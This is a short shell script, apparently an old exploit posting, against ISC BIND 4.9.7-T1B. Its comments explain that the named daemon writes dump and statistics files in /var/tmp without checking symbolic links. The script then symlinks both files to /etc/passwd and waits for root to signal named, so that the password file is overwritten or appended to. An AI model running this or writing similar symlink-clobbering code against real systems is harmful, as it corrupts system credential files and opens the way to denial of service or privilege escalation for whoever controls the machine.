#!/bin/sh # # Affected: ISC BIND 4.9.7-T1B # # The named daemon will dump the named database # to /var/tmp/named_dump.db when it receives a # SIGINT signal. It does not check for symbolic # links while doing so and can be made to # overwrite any file in the system. # # The named daemons will append named statistics # to /var/tmp/named.stats when it receives a # SIGIOT signal. It does not check for symbolic # links while doing so and ca be made to append # to any file in the system. ln -s /etc/passwd /var/tmp/named_dump.db ln -s /etc/passwd /var/tmp/named.stats echo "wait for root to send a SIGINT or SIGIOT to named" # www.hack.co.za #